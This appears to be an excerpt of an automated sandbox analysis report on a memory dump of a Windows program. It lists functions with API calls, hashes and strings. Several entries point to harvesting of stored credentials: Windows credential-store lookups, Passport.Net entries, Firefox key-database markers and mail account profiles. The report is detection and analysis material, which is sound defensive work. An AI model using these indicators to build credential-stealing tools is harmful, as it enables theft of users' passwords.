                                                                                                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.MSVCRT ref: 00442A5E
                                                                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00410364
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3974772901-0
                                                                                                                                                                • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                • memcpy.MSVCRT ref: 004440EB
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                                • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                                • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                                • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1786725549-0
                                                                                                                                                                • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2014771361-0
                                                                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                • memcpy.MSVCRT ref: 004061C1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                                • memcpy.MSVCRT ref: 00406462
                                                                                                                                                                • memcpy.MSVCRT ref: 00406475
                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                                                                                                • memcpy.MSVCRT ref: 004064B9
                                                                                                                                                                • memcpy.MSVCRT ref: 004064CC
                                                                                                                                                                • memcpy.MSVCRT ref: 004064F9
                                                                                                                                                                • memcpy.MSVCRT ref: 0040650E
                                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                • memcpy.MSVCRT ref: 004449CD
                                                                                                                                                                • memcpy.MSVCRT ref: 004449E3
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                • memcpy.MSVCRT ref: 00444A23
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2142929671-0
                                                                                                                                                                • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                                • API String ID: 2329438634-3671122194
                                                                                                                                                                • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                • String ID: Personalities
                                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                                • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                • memcpy.MSVCRT ref: 004108C3
                                                                                                                                                                Strings
                                                                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                • API String ID: 2859077140-3316789007
                                                                                                                                                                • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
